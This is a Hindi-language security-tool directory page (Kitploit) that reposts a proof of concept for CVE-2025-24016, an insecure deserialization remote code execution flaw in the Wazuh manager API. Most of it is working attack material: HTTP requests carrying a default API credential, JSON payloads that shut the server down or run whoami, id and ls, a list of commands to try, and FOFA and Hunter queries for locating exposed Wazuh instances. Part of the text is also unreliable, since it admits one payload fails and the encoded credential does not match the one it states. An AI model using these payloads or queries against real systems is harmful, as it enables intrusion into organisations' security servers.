Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24016-Wazuh-Remote-Code-Execution-RCE-PoC — Wazuh सर्वर में wazuh-manager पैकेज में असुरक्षित डिसीरियलाइज़ेशन के कारण एक गंभीर RCE भेद्यता की पहचान की गई है। यह बग Wazuh संस्करण ≥ 4.4.0 को प्रभावित करता है और इसे संस्करण 4.9.1 में पैच किया गया है। | Kitploit
उपकरण/GitHubGitHub/cybersecplayground/cve-2025-24016-wazuh-remote-code-execution-rce-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
GitHubcybersecplayground/cve-2025-24016-wazuh-remote-code-execution-rce-poc

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24016-Wazuh-Remote-Code-Execution-RCE-PoC

Wazuh सर्वर में wazuh-manager पैकेज में असुरक्षित डिसीरियलाइज़ेशन के कारण एक गंभीर RCE भेद्यता की पहचान की गई है। यह बग Wazuh संस्करण ≥ 4.4.0 को प्रभावित करता है और इसे संस्करण 4.9.1 में पैच किया गया है।

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

🚨 Wazuh रिमोट कोड एक्ज़ीक्यूशन (RCE) - PoC

📌 भेद्यता सारांश

Wazuh सर्वर में wazuh-manager पैकेज में असुरक्षित डिसीरियलाइज़ेशन के कारण एक गंभीर RCE भेद्यता की पहचान की गई है। यह बग Wazuh संस्करण ≥ 4.4.0 को प्रभावित करता है और संस्करण 4.9.1 में इसे ठीक किया गया है।

🔍 विवरण

यह दोष Wazuh API के DistributedAPI में है, जहाँ उपयोगकर्ता-नियंत्रित इनपुट को असुरक्षित रूप से डिसीरियलाइज़ किया जाता है। यह API एक्सेस वाले हमलावरों (जैसे, समझौता किया गया डैशबोर्ड या क्लस्टर नोड) को run_as एंडपॉइंट का उपयोग करके मास्टर सर्वर पर मनमाना Python कोड निष्पादित करने की अनुमति देता है।

📬 प्रूफ ऑफ कॉन्सेप्ट (Burp अनुरोध)

root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  
Content-Type: application/json

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

📌 Authorization हेडर wazuh-wui:MyS3cr37P450r.*- का base64 है।

📌 यह पेलोड Python की exit() विधि को कॉल करके Wazuh सर्वर को बंद कर देता है।

💥 प्रभाव

  • API के माध्यम से पूर्ण रिमोट कोड एक्ज़ीक्यूशन
  • PoC में सर्वर शटडाउन (DoS)
  • Wazuh क्लस्टरों में लेटरल मूवमेंट का जोखिम

🛡️ शमन

  • ✅ Wazuh v4.9.1 या उच्चतर संस्करण में अपग्रेड करें
  • 🚫 API को बाहरी रूप से एक्सपोज़ करने से बचें
  • 🧪 असामान्य API गतिविधि की निगरानी करें

✅ whoami चलाने के लिए उदाहरण पेलोड

root@kitploit:~
{
  "__unhandled_exc__": {
    "__class__": "os",
    "__import__": "os",
    "system": "whoami"
  }
}

लेकिन यह अकेले तब तक काम नहीं करेगा जब तक डिसीरियलाइज़ेशन कोड वास्तव में ऑब्जेक्ट ट्री को निष्पादित नहीं करता। इसके बजाय, एक __reduce__-आधारित ऑब्जेक्ट का उपयोग करें जो कोड निष्पादित करता है।

Python के os.system() का उपयोग करते हुए pickle-जैसे लॉजिक के साथ Burp अनुरोध का कार्यशील प्रारूप यहाँ दिया गया है:

💣 कार्यशील Burp RCE पेलोड (Python कोड निष्पादन)

root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==
Content-Type: application/json

{
  "__reduce__": [
    "__import__('os').system",
    ["whoami"]
  ]
}

🧬 ls चलाने के लिए, पेलोड बदलें:

root@kitploit:~
{
  "__reduce__": [
    "__import__('os').system",
    ["ls -la"]
  ]
}

आप इसका भी उपयोग कर सकते हैं:

root@kitploit:~
{
  "__reduce__": [
    "__import__('subprocess').getoutput",
    ["id"]
  ]
}

⚠️ नोट: इसके काम करने के लिए वास्तविक डिसीरियलाइज़ेशन बैकएंड में eval() या समान तंत्रों के साथ होना चाहिए। Wazuh PoC के आधार पर, यदि आप auth_context को नियंत्रित करते हैं तो यह वास्तव में संभव है।

🔐 प्रो टिप Burp में अनुरोध को इंटरसेप्ट करें, Repeater टैब पर जाएँ, और इस प्रकार के कई पेलोड परीक्षण करें:

  • "whoami"
  • "id"
  • "uname -a"
  • "ls /home/wazuh"

👇 क्वेरी

  • HUNTER : product.name="Wazuh"
  • FOFA : app="Wazuh"

यदि प्रतिक्रिया खाली है या स्थिति 500 है, तो लॉग जाँचें — कभी-कभी आउटपुट वापस नहीं आता। 📚 हैकर्स, सतर्क रहें! और bug bounty PoCs, bypasses और payloads आ रहे हैं!

दैनिक हैकिंग सामग्री के लिए 👉 @cybersecplayground को फॉलो करें!

#bugbounty #rce #wazuh #infosec #security #pentest #zeroday #exploit

टूल डाउनलोड करें